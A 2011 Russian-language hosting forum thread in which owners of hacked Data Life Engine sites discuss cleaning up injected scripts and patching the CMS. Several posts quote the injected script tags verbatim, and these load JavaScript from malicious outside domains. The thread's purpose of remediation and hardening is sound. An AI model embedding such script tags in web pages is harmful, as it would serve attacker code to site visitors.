Акционное предложение!   Домен  - 15 грн!   Домен   со скидкой 50% *
  • UAH
  • USD
  • RUB
  • EUR
  • +38(044) 392-74-33  Киев
  • +38(057) 728-39-00  Харьков
  • +38(056) 794-38-31  Днепропетровск
  • +38(062) 210-24-93  Донецк
  • +38(032) 229-58-93  Львов
  • +38(048) 738-57-70  Одесса
  • +38(093) 449-04-21  Life
  • +38(067) 400-88-44  Киевстар
  • +38(095) 007-72-35  MTC
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7(499) 348-28-61  Москва

Хостинг. Взломали сайт

Форумы Хостинг Взломали сайт
wolfes666
09.01.2011 09:10
хостинг: нет
домен: нет
Взломали сайт
Ребята помогите кто разбирается, у меня сайт на Data Life Engine сделан и все время кто-то в новостях прописывает в начале и в конце вот такой код, тех поддержка у нас не работает, восстановить mysql тоже (нету в списке новой базы).

Вот тот скрипт что он приписывает:

<script src="http://zheenix.msk.ru/a043bb882dd6b02d4a8a0074123bfeaa.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script>

он еще издевается! ...

Вот форум по этой теме (http://talk.prowebber.ru/index.php?showtopic=3990&pid=34123&st=0), я искал вредоносный код по которому он прописывает в новостях эту фигню, но ничего не нашел.

Кто разбирается помогите.
wolfes666
09.01.2011 09:39
хостинг: нет
домен: нет
может попробовать методы описаны тут http://bestwebber.ru/hacks/72-zashhita-dle-sajta-ot-vzloma.html открыть доступ к админ панелям только моему ip, или это не поможет?
alien131
10.01.2011 17:47
хостинг: есть
домен: есть
Обнови Data Life Engine...може профіксили баг.
або поміняй CMS.
wolfes666
10.01.2011 18:27
хостинг: нет
домен: нет
да это и хочу сделать

да) вроде все удачно прошло ) надеюсь в новой бэкдоров нету.
lineage_2008
12.01.2011 20:22
хостинг: нет
домен: нет
тоже самое у меня щас - (выгребаю 2 день - новостей слишком много). а код сидит тут /www/engine/cache/rss.tmp (удалите rss.tmp и код перестанет появляться в новостях Но прийдется это все <script src="http://zheenix.msk.ru/a043bb882dd6b02d4a8a0074123bfeaa.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script> удалять вручную с каждой новости ) файл rss.tmp сам востановится.
sosiska
12.01.2011 23:30
хостинг: есть
домен: есть
Вначале можно обезвредить вредоносный код с помощью функции Поиск и замена, которая есть в админпанели движка DLE. Просто меняем http://zheenix.msk.ru на пробел. Теперь скрипт не работает. Оставшиеся хвостики типа "/a043bb882dd6b02d4a8a0074123bfeaa.js" особого вреда, наверное, не представляют.
Но, чтобы больше эта проблема не возникала нужно подлатать дыры в движке. Инструкции ниже:



Для исправления откройте файл engine/inc/files.php и найдите:
$serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) );


замените на:
if ($member_id['user_group'] == 1) $serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) ); else $serverfile = '';

if ( $serverfile != '' ) {

$serverfile = str_replace( "\\", "/", $serverfile );
$serverfile = str_replace( "..", "", $serverfile );
$serverfile = str_replace( "/", "", $serverfile );
$serverfile_arr = explode( ".", $serverfile );
$type = totranslit( end( $serverfile_arr ) );
$curr_key = key( $serverfile_arr );
unset( $serverfile_arr[$curr_key] );

if ( in_array( strtolower( $type ), $allowed_files ) )
$serverfile = totranslit( implode( ".", $serverfile_arr ) ) . "." . $type;
else $serverfile = '';

}

if( $serverfile == ".htaccess") die("Hacking attempt!");


Откройте файл engine/classes/thumb.class.php и найдите:
$this->img['des'] = imagecreatetruecolor( $this->img['lebar_thumb'], $this->img['tinggi_thumb'] );


и добавьте выше:
if ($this->img['lebar_thumb'] < 1 ) $this->img['lebar_thumb'] = 1;
if ($this->img['tinggi_thumb'] < 1 ) $this->img['tinggi_thumb'] = 1;




Откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:
$count_result = 0;

ниже добавьте:
$sql_count = "";

Откройте файл engine/inc/templates.php и найдите:
$allow_save = false;

ниже добавьте:
$_REQUEST['do_template'] = trim( totranslit($_REQUEST['do_template'], false, false) );
$_REQUEST['do_language'] = trim( totranslit($_REQUEST['do_language'], false, false) );
sosiska
12.01.2011 23:31
хостинг: есть
домен: есть
Забыл написать, что с остальными адресами вредителя нужно поступить также, как с zheenix.msk.ru. То есть http://you-stupped-lox.ucoz.ru тоже заменяем на пробел.
lineage_2008
13.01.2011 00:09
хостинг: нет
домен: нет
Вначале можно обезвредить вредоносный код с помощью функции Поиск и замена, которая есть в админпанели движка DLE. Просто меняем <a href="http://zheenix.msk.ru" target="_blank" rel="nofollow">http://zheenix.msk.ru</a> на пробел. Теперь скрипт не работает.


А не проще эти файлы удалить, а не ставить пробелы ( как у меня получилось код обезвредить - читайте выше )

Но, чтобы больше эта проблема не возникала нужно подлатать дыры в движке. Инструкции ниже:


Для какой версии ДЛЕ эти инструкции ???
sosiska
13.01.2011 00:57
хостинг: есть
домен: есть
Удалить файлы не получится, так как они находятся НЕ на вашем сервере, а подгружается со стороны :) А так данная операция заняла 1,5 минуты.
Удаление файла rss.tmp не решит проблему уже "инфицированных" публикаций. Чистить руками целесообразно, если база новостей небольшая. А если 20 000 новостей, как у меня, то умом тронешься..
Инструкции в принципе для всех версий DLE. Просто в более новых, например в девятой, эти дыры уже закрыты. В некоторых одни закрыты, другие нет. Тут смотрите сами. А совсем старых вообще нужно выполнить каждый из этих шагов. Данные меры обезопасят сайт в будущем от подобных неприятностей.
Также можно предпринять дополнительные меры предосторожности: http://seo-doc.ru/defence/defence-dle/44-zashhita-dle-ot-vzloma.html
lineage_2008
13.01.2011 08:50
хостинг: нет
домен: нет
Удалить файлы не получится, так как они находятся НЕ на вашем сервере, а подгружается со стороны :)

Наверное Вы меня не поняли
Они были связаны с rss.tmp ( т.е удаляеш это <script src="http://zheenix.msk.ru/5237bfba6fad3b68ac7cb25aa38ed330.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script> на этом месте вылазит это <script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script><script src="http://www.karbrrbrr.co.cc/16d70455cdee14e9500a819485db36af.js" type="text/javascript"></script> и так до 10 разных адресов ( на большее мне терпения не хватило экспереминтировать ) а вот когда вычислил что файл rss.tmp является источником ( взял его и удалил по FTP с сервера ) то все эти адреса перестали появлятся. НО теперь приходиться вручную чистить новости. Кстати у меня версия 9.0 и тоже заплатки на дыры ставил - как видно непомогло.

Удаление файла rss.tmp не решит проблему уже "инфицированных" публикаций.

Те что успели новости заразится ( а заражаются они сразу все ) после удаления rss.tmp - БОЛЬШЕ НОВЫЕ АДРЕСА НЕ ПОЯВЛЯЮТСЯ в новостях

Чистить руками целесообразно, если база новостей небольшая. А если 20 000 новостей, как у меня, то умом тронешься..

Я еще не тронулся =). Если дорожите своими посетителями - то прийдется чистить новости руками ( я уже лишился 2-3К людей за время которое этот скрипт работал - на данный момент больше половины базы новостей почистил и люди стали опять появлятся )

На этом разрешите откланятся - а то тема становится бесполезным спором (флудом).

Я описал свой способ обезвреживания - который у меня нормально сработал.
wolfes666
13.01.2011 09:46
хостинг: нет
домен: нет
я просто новую версию накатал ) и восстановил mysql ) новости еще не все почистил )
wolfes666
15.01.2011 11:14
хостинг: нет
домен: нет
снова взломали сайт <script src="http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js" type="text/javascript"></script>
wolfes666
15.01.2011 11:15
хостинг: нет
домен: нет
только пару дней назад новый сайт установил...
wolfes666
15.01.2011 11:18
хостинг: нет
домен: нет
Володя

а где этот зараженный файл?
lineage_2008
15.01.2011 19:22
хостинг: нет
домен: нет
снова взломали сайт <script src="<a href="http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js"" target="_blank" rel="nofollow">http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js"</a> type="text/javascript"></script>

Тоже самое (только почистил) - поставил 8.3 (была 9.0) посмотрим что утром будет (появятся новые адреса или нет)

вот нашел инфу об этом http://talk.prowebber.ru/index.php?showtopic=3990
Arturjan
15.01.2011 22:45
хостинг: нет
домен: есть
Удали на..й это DLE!!!
alien131
15.01.2011 23:27
хостинг: есть
домен: есть
Видали всі файли... постав з нуля CMS і не став старий шаблон!

P.S.: в мене ніколи просто такого не було
Arturjan
15.01.2011 23:54
хостинг: нет
домен: есть
Слушай если я сейчас начну качать твои конфиги посмотрим что с этого получится.Просто в Joomla качаются пустыми.И ты сам написал что тебя ломали много раз - так зачем это тебе нужно?
Arturjan
16.01.2011 00:08
хостинг: нет
домен: есть
Права поставь на конфиги другие.Все будет работать,я одному пацеку так вопще права не менял и у него все работало.
birdsong
17.01.2011 15:01
хостинг: есть
домен: нет
Когда все почистите, не забудьте сменить все пароли FTP. А также проверьте версию своего антивируса. Возможно скрипт прописывают с Вашего же компа.
Удачи.
lineage_2008
03.02.2011 00:03
хостинг: нет
домен: нет
Вот что еще нашел по этой теме - http://dle.net.ua/bagfixs/5817-ocherednaya-dyrka-na-dle.html
Участвовать в общении на этом форуме могут только
зарегистрированные пользователи.

Если вы уже зарегистрированы Вам необходимо войти на форум.

Тема закрыта по истечению срока давности.
Горячая линия
(044)
392 74 33
другие города